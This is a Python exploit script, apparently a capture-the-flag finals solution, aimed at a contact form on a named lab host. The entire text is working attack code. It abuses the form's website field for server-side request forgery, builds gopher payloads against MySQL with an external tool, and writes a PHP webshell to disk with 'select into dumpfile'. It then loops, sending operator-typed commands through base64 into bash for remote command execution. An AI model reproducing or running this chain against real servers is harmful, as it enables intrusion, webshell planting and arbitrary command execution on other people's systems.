Ultimate Hacker Championship 17° Finals - Exploit Script

ssrf.py

import requests
import string
import base64

def attempt(payload):
        data = {"contactName":"aa","contactEmail":"aa@a.com","website": payload,"contactMessage": "A" * 40}
        r = requests.post('https://uhclabs.labdepentest.com.br/inc/sendEmail.php', data=data)
        output = r.text
        if 'went wrong.' in output:
            print("error")
            attempt(payload)
        else:
            for char in output:
                if char in string.printable:
                    print(char, end='')
                else:
                    print(' ', end='')


while True:
    payload = input('> ')
    print(payload)
    payload = base64.b64encode(payload.encode()).decode()
    write_file = """select '<?php system(\\"echo %s | base64 -d | bash\\");' into dumpfile '/uhc/celesian.php';""" % payload
    payload = write_file
    gen = "printf 'root\n'\"%s\n\" | python gopherus.py  --exploit mysql  | grep gopher: | sed 's/^.....//g'| cat" % payload
    payload = __import__("os").popen(gen).read()
    payload = payload.split('\x1b[0m\n')[0]
    print(repr(payload))
    attempt(payload)